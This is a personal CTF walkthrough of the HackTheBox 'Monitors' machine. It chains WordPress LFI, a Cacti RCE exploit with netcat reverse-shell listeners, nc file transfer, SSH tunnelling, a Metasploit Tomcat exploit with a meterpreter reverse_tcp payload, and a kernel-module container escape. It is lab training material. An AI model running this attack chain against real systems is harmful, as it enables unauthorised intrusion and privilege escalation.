Monitors Walkthrough — Hackthebox

Hi guy My Name is Ahmed (SadC0d3r)
To day i will solve Monitors machine
OS : Linux
Difficulty : Hard
Ip :
Let’s Start
i will nmap the target but i didn’t get unnormal port is opened
the ports is opened is 22 and 80
When I go to the Ip i see this this message

so i go to /etc/hosts and add the ip with host name

then go tho the domain monitors.htb

now i want get info about the site
when i saw the index page i see this line

and In wappalyzer addon i identify the web technology

It used wordpress version 5.5.1
Now i use wpscan tool to get more info about the site and know the if exist thing vulnerable or not
sudo wpscan — url http://monitors.htb/ — api-token XYZ -e vp,vt
This command it will be scan the site and enumerate all plugins and themes may be vulnerable
The result is big but the important thing is

i will go to the exploit-db url is displayed on screen and i get the vulnerable endpoint

Done it worked and i get user name marcus i try get ssh key by this path
/home/marcus/.ssh/id_rsa but i can’t
then i read wp-config.php

Great i get the DB connection info
i tried get RCE from LFI by several methods but failed and try use the DB password with username Marcus but failed again
so i get list of LFI paths and send the request to intruder and i use the paths list

All content length with 166 this is meaning nothing is returned
i will click to the length tap to changing the sorting method

After opened some of response i found thing maybe important in this path

i found this subdomain i go to it
i can’t because i should add this subdomain to machine ip in /etc/hosts

and then go to the subdomain

how i login without know any credential
i have username and password {marcus, DB password} but i still i can’t login
i tried user the username is admin

Yessss… i logged in
this is first time see this CMS so i didn’t know how exploit or use it so i go to about page and saw the version and go to Goolge to make some searching to exploit it

CMS name : Cacti
Version : 1.2.12
i found this exploit
i downloaded it and start to use it

this is options to use the exploit
Take care you should run listener before run the exploit code
nc -vlp 4444
and now run the exploit code
python -t http://cacti-admin.monitors.htb -u admin -p BestAdministrator@2020! — lhost — lport 4444

Exploit is completed and lets check the listener
yes i get the RCE

Run this command to get spawn shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’

and i will go to /home to try get the user
i will use the DB password to try get the marcus user but i can’t

i found some of file but i can’t read any file so i will run this command
grep ‘marcus’ /etc -R 2>/dev/null
to get all file didn’t have binaries

i found this script so i will read it by this command
cat /home/marcus/.backup/

i found pass i will try to use it to get marcus user

Great i get marcus user and read the user flag
now i will connect with ssh to more comfortable shell
ssh marcus@

ok … now i saw file called note.txt
lets see it

this is comment told the docker should be updated but it still not
ok i will install on the server the linpeas script to scan anyprivilege escalation potential
but i facing a problem the server doesn’t have wget or curl
but after do some of searching i found method by nc

in our attack box write this command
nc -lvp 5555 < is a leanpeas script
in server write this command
nc 4444 >

ok lets give the script execute permeation by this commmand
chmod +x
and run the script
./ -a

After the tool finished i take time to review the result

Port 8433 is a default port in apache tomcat so i want open the service it working in this port but if you put the monitors.htb:8443 you didn’t can get the service mmm this is a proxy then i will do port forwarding ssh tunnling
ssh -L 8443: marcus@

Ok i accessed the service and detected the version of tomcat
Version : 9.0.31
lets go to the google and search for exploit for this version
I spent too much time to searching and testing and finally i got the right exploit
Now i will use metasploit to exploit
write those command
search CVE-2020–9496

then use the exploit by this command
use 0

Now write options to setup the exploit
set PAYLOAD linux/x86/meterpreter/reverse_tcp

Great i got meterpreter session
when i wrote whoami or id the command didn’t run so i write shell to get the server shell

i get the root i get the root

lets get the flag

where is the flag!
after a few minutes I realized that this a container

Now i want to breakout the container to access the root server so lets google it
I will check Container Capabilities by this command
capsh — print

Ok this is vulnerable then i will search again to get the exploit
i found this article toke about this vulnerability
I will use the exploit code in the article
Go back to meterpreter session again
and on your attackbox open the editor

don’t forget set your IP and port

but wait
when i solve this machine i facing a lot of problems in this Makefile so follow me
in shell go to /lib/modules and ls

choose anyone and replce $(shell uname -r) in Makefile to
like that

And in variable M remove $(PWD) and write /

Final file
now lets upload the files by meterpreter

write shell
then make

now open netcat leistner
nc -vlp 8888
now in server write this command
insmod ex.ko

the root is on fire

The Monitors has been PWNed
I hope you like the explanation, thank you
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Ahmed Rabeaa Mosaa (@AhmedMosaa18) / Twitter
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